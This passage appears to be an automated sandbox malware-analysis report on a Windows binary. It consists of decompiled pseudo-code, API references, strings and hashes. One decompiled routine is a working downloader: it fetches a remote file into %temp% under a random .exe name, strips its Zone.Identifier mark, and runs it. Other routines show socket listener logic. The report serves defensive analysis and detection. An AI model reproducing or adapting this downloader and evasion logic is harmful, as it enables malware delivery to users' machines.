                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040D7F0, _t24, 0, 0);
                                                                                                                                                                                                                                                                  						goto L6;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						E0040DA20(_t24, _t27);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040da90
                                                                                                                                                                                                                                                                  0x0040daa2
                                                                                                                                                                                                                                                                  0x0040daa8
                                                                                                                                                                                                                                                                  0x0040daae
                                                                                                                                                                                                                                                                  0x0040dab5
                                                                                                                                                                                                                                                                  0x0040dac1
                                                                                                                                                                                                                                                                  0x0040dac4
                                                                                                                                                                                                                                                                  0x0040daca
                                                                                                                                                                                                                                                                  0x0040dad0
                                                                                                                                                                                                                                                                  0x0040dad2
                                                                                                                                                                                                                                                                  0x0040dad7
                                                                                                                                                                                                                                                                  0x0040dad7
                                                                                                                                                                                                                                                                  0x0040dadb
                                                                                                                                                                                                                                                                  0x0040db3a
                                                                                                                                                                                                                                                                  0x0040db40
                                                                                                                                                                                                                                                                  0x0040dadd
                                                                                                                                                                                                                                                                  0x0040dadf
                                                                                                                                                                                                                                                                  0x0040dae3
                                                                                                                                                                                                                                                                  0x0040dae7
                                                                                                                                                                                                                                                                  0x0040daeb
                                                                                                                                                                                                                                                                  0x0040dafb
                                                                                                                                                                                                                                                                  0x0040db05
                                                                                                                                                                                                                                                                  0x0040db0e
                                                                                                                                                                                                                                                                  0x0040db2e
                                                                                                                                                                                                                                                                  0x0040db37
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040db10
                                                                                                                                                                                                                                                                  0x0040db10
                                                                                                                                                                                                                                                                  0x0040db1b
                                                                                                                                                                                                                                                                  0x0040db1b
                                                                                                                                                                                                                                                                  0x0040db0e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BC3E,00000000), ref: 0040DAB5
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DAC4
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040DB05
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: SetEvent.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA3D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: CloseHandle.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA47
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0040DB31
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3943618503-0
                                                                                                                                                                                                                                                                  • Opcode ID: c94050519661c8a51bd85b0177b6e18eb17cf6b8fff5dae366dd3462cd044c6d
                                                                                                                                                                                                                                                                  • Instruction ID: 5276f6ad8d77c11c83a369dc1e5a02b163374df96baf18b758578e552dca49b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c94050519661c8a51bd85b0177b6e18eb17cf6b8fff5dae366dd3462cd044c6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54119874B44300AFE7109FB48C86B5776A0EF04714F508579FA58EA2D2D2B5D4088B5A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040D210(char* _a4, signed int _a8) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				short _v1044;
                                                                                                                                                                                                                                                                  				signed char _v1045;
                                                                                                                                                                                                                                                                  				short _v1572;
                                                                                                                                                                                                                                                                  				void* _v1576;
                                                                                                                                                                                                                                                                  				void* _v1580;
                                                                                                                                                                                                                                                                  				short _v2100;
                                                                                                                                                                                                                                                                  				void _v2364;
                                                                                                                                                                                                                                                                  				long _v2368;
                                                                                                                                                                                                                                                                  				long _v2372;
                                                                                                                                                                                                                                                                  				void* _v2376;
                                                                                                                                                                                                                                                                  				intOrPtr* _v2380;
                                                                                                                                                                                                                                                                  				intOrPtr _v2384;
                                                                                                                                                                                                                                                                  				char _v2385;
                                                                                                                                                                                                                                                                  				intOrPtr _v2392;
                                                                                                                                                                                                                                                                  				signed int _t88;
                                                                                                                                                                                                                                                                  				signed int _t90;
                                                                                                                                                                                                                                                                  				int _t96;
                                                                                                                                                                                                                                                                  				signed int _t97;
                                                                                                                                                                                                                                                                  				signed int _t99;
                                                                                                                                                                                                                                                                  				signed int _t101;
                                                                                                                                                                                                                                                                  				signed int _t111;
                                                                                                                                                                                                                                                                  				signed char _t125;
                                                                                                                                                                                                                                                                  				signed char _t127;
                                                                                                                                                                                                                                                                  				void* _t181;
                                                                                                                                                                                                                                                                  				void* _t182;
                                                                                                                                                                                                                                                                  				void* _t184;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				srand(GetTickCount());
                                                                                                                                                                                                                                                                  				_t182 = _t181 + 4;
                                                                                                                                                                                                                                                                  				_v1045 = 0;
                                                                                                                                                                                                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                                                                                                                                                                                                  				_v2380 = _a4;
                                                                                                                                                                                                                                                                  				_v2384 = _v2380 + 1;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_v2385 =  *_v2380;
                                                                                                                                                                                                                                                                  					_v2380 = _v2380 + 1;
                                                                                                                                                                                                                                                                  				} while (_v2385 != 0);
                                                                                                                                                                                                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                                                                                                                                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                                                                                                                                                                                                  				_t88 = rand();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				_t90 = rand();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                  				_t184 = _t182 + 0x20;
                                                                                                                                                                                                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v2376 != 0) {
                                                                                                                                                                                                                                                                  					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v1576 != 0) {
                                                                                                                                                                                                                                                                  						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                                                                                                                                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							CloseHandle(_v1580);
                                                                                                                                                                                                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                  							DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                  							Sleep(0x3e8);
                                                                                                                                                                                                                                                                  							_t125 = E0040CEF0( &_v1572);
                                                                                                                                                                                                                                                                  							_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								Sleep(0x7d0);
                                                                                                                                                                                                                                                                  								_t127 = E0040D0B0( &_v1572);
                                                                                                                                                                                                                                                                  								_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  										ExitProcess(0);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v1045 = 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						CloseHandle(_v1580);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v1576);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InternetCloseHandle(_v2376);
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                                                                                                                                                                                                  				if(_t96 == 0) {
                                                                                                                                                                                                                                                                  					_t97 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                                                                                                                                                                                                  					_t99 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t101 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					_push( &_v1572);
                                                                                                                                                                                                                                                                  					_push( &_v1044);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					L0040E9D2();
                                                                                                                                                                                                                                                                  					if(_t96 == 0) {
                                                                                                                                                                                                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                                                                                                                                                  						if((E0040CEF0( &_v1572) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  							return DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						Sleep(0x7d0);
                                                                                                                                                                                                                                                                  						_t111 = E0040D0B0( &_v1572) & 0x000000ff;
                                                                                                                                                                                                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  							return _t111;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t96;
                                                                                                                                                                                                                                                                  			}






























                                                                                                                                                                                                                                                                  0x0040d220
                                                                                                                                                                                                                                                                  0x0040d225
                                                                                                                                                                                                                                                                  0x0040d228
                                                                                                                                                                                                                                                                  0x0040d240
                                                                                                                                                                                                                                                                  0x0040d249
                                                                                                                                                                                                                                                                  0x0040d258
                                                                                                                                                                                                                                                                  0x0040d25e
                                                                                                                                                                                                                                                                  0x0040d266
                                                                                                                                                                                                                                                                  0x0040d26c
                                                                                                                                                                                                                                                                  0x0040d273
                                                                                                                                                                                                                                                                  0x0040d288
                                                                                                                                                                                                                                                                  0x0040d2a3
                                                                                                                                                                                                                                                                  0x0040d2ab
                                                                                                                                                                                                                                                                  0x0040d2b0
                                                                                                                                                                                                                                                                  0x0040d2bf
                                                                                                                                                                                                                                                                  0x0040d2c4
                                                                                                                                                                                                                                                                  0x0040d2e6
                                                                                                                                                                                                                                                                  0x0040d2ec
                                                                                                                                                                                                                                                                  0x0040d302
                                                                                                                                                                                                                                                                  0x0040d30f
                                                                                                                                                                                                                                                                  0x0040d331
                                                                                                                                                                                                                                                                  0x0040d33e
                                                                                                                                                                                                                                                                  0x0040d360
                                                                                                                                                                                                                                                                  0x0040d36d
                                                                                                                                                                                                                                                                  0x0040d373
                                                                                                                                                                                                                                                                  0x0040d3be
                                                                                                                                                                                                                                                                  0x0040d3be
                                                                                                                                                                                                                                                                  0x0040d3cd
                                                                                                                                                                                                                                                                  0x0040d3e6
                                                                                                                                                                                                                                                                  0x0040d3f6
                                                                                                                                                                                                                                                                  0x0040d401
                                                                                                                                                                                                                                                                  0x0040d40e
                                                                                                                                                                                                                                                                  0x0040d413
                                                                                                                                                                                                                                                                  0x0040d41b
                                                                                                                                                                                                                                                                  0x0040d460
                                                                                                                                                                                                                                                                  0x0040d41d
                                                                                                                                                                                                                                                                  0x0040d422
                                                                                                                                                                                                                                                                  0x0040d42f
                                                                                                                                                                                                                                                                  0x0040d434
                                                                                                                                                                                                                                                                  0x0040d43d
                                                                                                                                                                                                                                                                  0x0040d446
                                                                                                                                                                                                                                                                  0x0040d44a
                                                                                                                                                                                                                                                                  0x0040d44a
                                                                                                                                                                                                                                                                  0x0040d450
                                                                                                                                                                                                                                                                  0x0040d450
                                                                                                                                                                                                                                                                  0x0040d457
                                                                                                                                                                                                                                                                  0x0040d41b
                                                                                                                                                                                                                                                                  0x0040d46d
                                                                                                                                                                                                                                                                  0x0040d46d
                                                                                                                                                                                                                                                                  0x0040d47a
                                                                                                                                                                                                                                                                  0x0040d47a
                                                                                                                                                                                                                                                                  0x0040d487
                                                                                                                                                                                                                                                                  0x0040d492
                                                                                                                                                                                                                                                                  0x0040d498
                                                                                                                                                                                                                                                                  0x0040d4a1
                                                                                                                                                                                                                                                                  0x0040d4a7
                                                                                                                                                                                                                                                                  0x0040d4ac
                                                                                                                                                                                                                                                                  0x0040d4be
                                                                                                                                                                                                                                                                  0x0040d4c4
                                                                                                                                                                                                                                                                  0x0040d4c9
                                                                                                                                                                                                                                                                  0x0040d4d8
                                                                                                                                                                                                                                                                  0x0040d4dd
                                                                                                                                                                                                                                                                  0x0040d4ff
                                                                                                                                                                                                                                                                  0x0040d508
                                                                                                                                                                                                                                                                  0x0040d50a
                                                                                                                                                                                                                                                                  0x0040d512
                                                                                                                                                                                                                                                                  0x0040d519
                                                                                                                                                                                                                                                                  0x0040d51a
                                                                                                                                                                                                                                                                  0x0040d51c
                                                                                                                                                                                                                                                                  0x0040d523
                                                                                                                                                                                                                                                                  0x0040d53c
                                                                                                                                                                                                                                                                  0x0040d54c
                                                                                                                                                                                                                                                                  0x0040d557
                                                                                                                                                                                                                                                                  0x0040d571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d5ae
                                                                                                                                                                                                                                                                  0x0040d578
                                                                                                                                                                                                                                                                  0x0040d58d
                                                                                                                                                                                                                                                                  0x0040d592
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d59d
                                                                                                                                                                                                                                                                  0x0040d59f
                                                                                                                                                                                                                                                                  0x0040d59f
                                                                                                                                                                                                                                                                  0x0040d592
                                                                                                                                                                                                                                                                  0x0040d523
                                                                                                                                                                                                                                                                  0x0040d5b7

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040D219
                                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 0040D220
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D240
                                                                                                                                                                                                                                                                  • mbstowcs.NTDLL ref: 0040D2A3
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D2AB
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D2BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D2E6
                                                                                                                                                                                                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D2FC
                                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D32B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D35A
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040D38D
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040D3BE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D3CD
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D3E6
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D3F6
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D44A
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040D422
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: memset.NTDLL ref: 0040D0BE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: CreateProcessW.KERNEL32 ref: 0040D105
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: Sleep.KERNEL32(000003E8), ref: 0040D115
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D460
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D46D
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D47A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D487
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D492
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4A7
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0040D4BE
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4C4
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4D8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D4FF
                                                                                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040D51C
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D53C
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D54C
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D557
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D401
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040CF24
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040CF45
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040CF64
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CF7D
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040D578
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D59F
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D5AE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36, xrefs: 0040D2F7
                                                                                                                                                                                                                                                                  • %temp%, xrefs: 0040D23B
                                                                                                                                                                                                                                                                  • %s\%d%d.exe, xrefs: 0040D4F3
                                                                                                                                                                                                                                                                  • %s:Zone.Identifier, xrefs: 0040D3DA
                                                                                                                                                                                                                                                                  • %s:Zone.Identifier, xrefs: 0040D530
                                                                                                                                                                                                                                                                  • %s\%d%d.exe, xrefs: 0040D2DA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                                                                                                                                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  • API String ID: 3135114409-2302825242
                                                                                                                                                                                                                                                                  • Opcode ID: d647f7c06b308ba21988e54423a7eea726d601316595509d7ca128eb0134560f
                                                                                                                                                                                                                                                                  • Instruction ID: ca6c14ff5b50aa8784996ad2499aaf2eb04ac4ca7c8f7d7d042f209e4fd4e3d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d647f7c06b308ba21988e54423a7eea726d601316595509d7ca128eb0134560f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4091D7B1901314ABEB30DB50CC45FAA7379AF88305F0085F9F609B51C2DA789A88CF69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 336 40e120-40e147 GetTickCount WaitForSingleObject 337 40e2c9-40e2cf 336->337 338 40e14d-40e164 WSAWaitForMultipleEvents 336->338 339 40e1f0-40e203 GetTickCount 338->339 340 40e16a-40e181 WSAEnumNetworkEvents 338->340 341 40e243-40e24c GetTickCount 339->341 342 40e205-40e214 EnterCriticalSection 339->342 340->339 343 40e183-40e188 340->343 347 40e2b5-40e2c3 WaitForSingleObject 341->347 348 40e24e-40e25d EnterCriticalSection 341->348 344 40e216-40e21d 342->344 345 40e23a-40e241 LeaveCriticalSection 342->345 343->339 346 40e18a-40e190 343->346 349 40e235 call 40e020 344->349 350 40e21f-40e227 344->350 345->347 346->339 351 40e192-40e1b1 accept 346->351 347->337 347->338 352 40e2a1-40e2b1 LeaveCriticalSection GetTickCount 348->352 353 40e25f-40e277 InterlockedExchangeAdd call 40bb80 348->353 349->345 350->344 354 40e229-40e230 LeaveCriticalSection 350->354 351->339 356 40e1b3-40e1c2 call 40dcb0 351->356 352->347 361 40e297-40e29f 353->361 362 40e279-40e282 353->362 354->347 356->339 363 40e1c4-40e1df call 40df40 356->363 361->352 361->353 362->361 364 40e284-40e28d call 409320 362->364 363->339 369 40e1e1-40e1e7 363->369 364->361 369->339 370 40e1e9-40e1eb call 40e4f0 369->370 370->339
                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040E120(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                                                                                                                  				char _v68;
                                                                                                                                                                                                                                                                  				long _v72;
                                                                                                                                                                                                                                                                  				signed char _v80;
                                                                                                                                                                                                                                                                  				long _v92;
                                                                                                                                                                                                                                                                  				char _v96;
                                                                                                                                                                                                                                                                  				char _v100;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                                                                                                                  				long _t31;
                                                                                                                                                                                                                                                                  				long _t33;
                                                                                                                                                                                                                                                                  				long _t34;
                                                                                                                                                                                                                                                                  				long _t42;
                                                                                                                                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                                                                                                                                  				intOrPtr _t70;
                                                                                                                                                                                                                                                                  				intOrPtr* _t73;
                                                                                                                                                                                                                                                                  				long _t74;
                                                                                                                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                                                                                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				signed int _t79;
                                                                                                                                                                                                                                                                  				void* _t81;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                                                                                                                                                                                                  				_t31 = GetTickCount();
                                                                                                                                                                                                                                                                  				_t56 = _a4;
                                                                                                                                                                                                                                                                  				_v72 = _t31;
                                                                                                                                                                                                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                  				if(_t33 == 0) {
                                                                                                                                                                                                                                                                  					L25:
                                                                                                                                                                                                                                                                  					return _t33;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					_t73 = _t56 + 0x18;
                                                                                                                                                                                                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_t33 != 0x102) {
                                                                                                                                                                                                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                                                                                                                                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                                                                                                                                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                  							_v100 = 0x10;
                                                                                                                                                                                                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                                                                                                                                                                                                  							if(_t49 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_t77 = E0040DCB0(_t56, _t49);
                                                                                                                                                                                                                                                                  								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  								if(_t77 != 0) {
                                                                                                                                                                                                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                                                                                                                                                                                                  									E0040DF40(0, _t77, _t56, _t15);
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                                                                                                                                                                                                  										E0040E4F0(_t77);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t34 = GetTickCount();
                                                                                                                                                                                                                                                                  					_t74 = _v92;
                                                                                                                                                                                                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                                                                                                                                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                  						if(_t75 == 0) {
                                                                                                                                                                                                                                                                  							L23:
                                                                                                                                                                                                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                  							_v92 = GetTickCount();
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						} else {
